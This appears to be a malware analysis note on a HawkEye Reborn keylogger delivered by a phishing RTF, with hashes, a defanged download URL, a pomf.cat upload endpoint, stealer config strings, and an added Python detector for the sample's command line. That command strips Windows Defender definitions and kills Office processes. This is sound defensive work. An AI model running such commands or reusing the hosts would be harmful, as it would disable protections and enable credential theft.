Neonprimetime

2018-06-06 #hawkeye #keylogger sample

Jun 6th, 2018
found by @neonprimetime security
#rtf
6/5/2018 email subject "R.F.Q. for the contract project procurement exercise ..."


7f51124e0d15008cacd0a407d2ca9bf8
https://www.hybrid-analysis.com/sample/4eb5a28d72f55c6e8d4d80c650547266e6c9aa0b2a73f9253f3cc2a61010886f?environmentId=100
https://app.any.run/tasks/0b2f956d-d4a9-4672-98c3-c2c27cf1d718

opens excel
downloads
hxxp://stemtopx.com/work/new/14.exe
46B255CB008D99DA1D0FE1EB51006A6A

copies itself to and runs from
C:\Users\Win732\AppData\Roaming\Microsoft\Windows\DsvHelper\filename.exe

also seen
C:\Users\Public\Host32.exe
EBDC467745BFCD089E1337D79A5AB422

runs this command
"C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit
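The command line above chains two behaviours a defender can alert on: MpCmdRun.exe stripping Defender's definitions, and taskkill of the Office processes that opened the lure. As an added example that is not part of the original paste, the following Python splits a cmd.exe line on its "&" chain and flags those two behaviours. It runs over the sample's own command line plus two constructed benign lines; the OFFICE_PROCESSES set, the rule names and the suspicion threshold are my own choices, not anything from the sample.

```python
import re
from dataclasses import dataclass

# Office processes the sample kills before running; set chosen for this example.
OFFICE_PROCESSES = {"winword.exe", "excel.exe", "mspub.exe", "powerpnt.exe", "outlook.exe"}

# Leading '"...\cmd.exe" /c ' or 'cmd /k ' wrapper, stripped so only the chained payload is analysed.
CMD_WRAPPER = re.compile(r'^\s*"?(?:[^"\s]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+', re.IGNORECASE)
TOKEN = re.compile(r'"[^"]*"|\S+')

# The command line recorded in the note above.
SAMPLE_CMDLINE = r'"C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit'
# Constructed benign lines: a signature update, and an admin script closing one Excel instance.
BENIGN_UPDATE = r'"C:\Windows\System32\cmd.exe" /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -SignatureUpdate'
SINGLE_KILL = r'cmd /c taskkill /f /im excel.exe'


@dataclass
class Finding:
    rule: str       # short rule name
    evidence: str   # the sub-command that triggered it


def split_chain(cmdline: str) -> list[str]:
    """Split a cmd.exe line into its '&' / '&&'-chained sub-commands, respecting quotes."""
    parts, cur, in_quote = [], [], False
    i = 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quote = not in_quote
            cur.append(ch)
        elif ch == "&" and not in_quote:
            parts.append("".join(cur))
            cur = []
            if cmdline[i + 1 : i + 2] == "&":   # '&&' is a single operator
                i += 1
        else:
            cur.append(ch)
        i += 1
    parts.append("".join(cur))
    return [p.strip() for p in parts if p.strip()]


def tokenize(subcmd: str) -> list[str]:
    """Tokenize one sub-command: quoted paths stay whole, quotes dropped, lower-cased."""
    return [t.strip('"').lower() for t in TOKEN.findall(subcmd)]


def analyze(cmdline: str) -> list[Finding]:
    """Return one Finding per sub-command that matches a rule."""
    findings = []
    payload = CMD_WRAPPER.sub("", cmdline, count=1)
    for sub in split_chain(payload):
        toks = tokenize(sub)
        if not toks:
            continue
        exe = toks[0].rsplit("\\", 1)[-1]          # basename of the program
        if exe in ("mpcmdrun.exe", "mpcmdrun") and "-removedefinitions" in toks:
            findings.append(Finding("defender_definitions_removed", sub))
        elif exe in ("taskkill.exe", "taskkill") and "/im" in toks:
            idx = toks.index("/im") + 1
            target = toks[idx] if idx < len(toks) else ""
            if target in OFFICE_PROCESSES:
                findings.append(Finding("office_process_killed", sub))
    return findings


def is_suspicious(findings: list[Finding]) -> bool:
    """Definition removal alone is enough; Office kills need two or more, since a
    single taskkill of excel.exe shows up in ordinary admin scripts."""
    rules = [f.rule for f in findings]
    return "defender_definitions_removed" in rules or rules.count("office_process_killed") >= 2


if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_UPDATE, SINGLE_KILL):
        found = analyze(line)
        print(f"suspicious={is_suspicious(found)} findings={[f.rule for f in found]}")
```

Feed it the CommandLine field of process-creation events (Sysmon event 1 or Security 4688 with command-line auditing); the wrapper regex only strips the cmd.exe prefix, so a chain launched directly by a .NET dropper like 14.exe is analysed the same way.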

----------
14.exe is a .NET dll, so the decompiled code is readable
WindowsApplication1.Shutdown_manager
public static byte[] FJaioefgkaoeK(byte[] Data)
{
....
MyProject.Forms.Form1.TrackBar1.Value = Conversions.ToInteger(MyProject.Forms.Shutdown_manager.INI_ReadValueFromFile("Startseite", "Url", "", ".\\Configurations datei.ini"));
MyProject.Forms.Shutdown_manager.Herunterfahren.Stop();
MyProject.Forms.Shutdown_manager.Neustarten.Stop();
Interaction.MsgBox("Bitte geben sie eine zeit an!", MsgBoxStyle.Exclamation, "Countdown Konnte nicht eingeleitet werden!");
....
}


--------
interesting in-memory strings
--------
0x29f1c93 (17): ConfuserEx v1.0.0
0x29f22c0 (104): HawkEye Keylogger - Reborn v8 - {0} Logs - {1} \ {2}
0x29f2329 (122): HawkEye Keylogger - Reborn v8{0}{1} Logs{0}{2} \ {3}{0}{0}{4}
0x29f244f (52): http://pomf.cat/upload.php
0x29f2484 (38): https://a.pomf.cat/
0x29f29d7 (26): passwordfile
0x2b381b0 (14): _EmailUsername
0x2b381bf (14): _EmailPassword
0x2b381ce (12): _EmailServer
0x2b381db (10): _EmailPort
0x2b381f0 (10): _FTPServer
0x2b381fb (12): _FTPUsername
0x2b38208 (12): _FTPPassword
0x2b38231 (12): _ProxySecret
0x2b38248 (12): _PanelSecret
0x2b38255 (12): _LogInterval
0x2b38262 (16): _PasswordStealer
0x2b38273 (16): _KeyStrokeLogger
0x2b38284 (16): _ClipboardLogger
0x2b38295 (17): _ScreenshotLogger
0x2b382a7 (13): _WebCamLogger
0x2b382b5 (11): _SystemInfo
0x2b382ca (16): _InstallLocation
0x2b382db (14): _InstallFolder
0x2b382ea (16): _InstallFileName
0x2b382fb (15): _InstallStartup
0x2b3830b (26): _InstallStartupPersistance
0x2b38326 (15): _HistoryCleaner
0x2b38352 (10): _Disablers
0x2b3835d (19): _DisableTaskManager
0x2b38371 (21): _DisableCommandPrompt
0x2b38387 (15): _DisableRegEdit
0x2b38397 (18): _ProcessProtection
0x2b383aa (17): _ProcessElevation
0x2b383bc (16): _AntiVirusKiller
0x2b383cd (10): _BotKiller
0x2b383d8 (13): _AntiDebugger
0x2b383e6 (15): _ExecutionDelay
0x2b383f6 (16): _FakeMessageShow
0x2b38407 (17): _FakeMessageTitle
0x2b38419 (16): _FakeMessageText
0x2b3842a (16): _FakeMessageIcon
0x2b3843b (15): _WebsiteVisitor
0x2b3844b (22): _WebsiteVisitorVisible
0x2b38462 (20): _WebsiteVisitorSites
0x2b38477 (15): _WebsiteBlocker
0x2b38487 (20): _WebsiteBlockerSites
0x2b3849c (11): _FileBinder
0x2b384a8 (16): _FileBinderFiles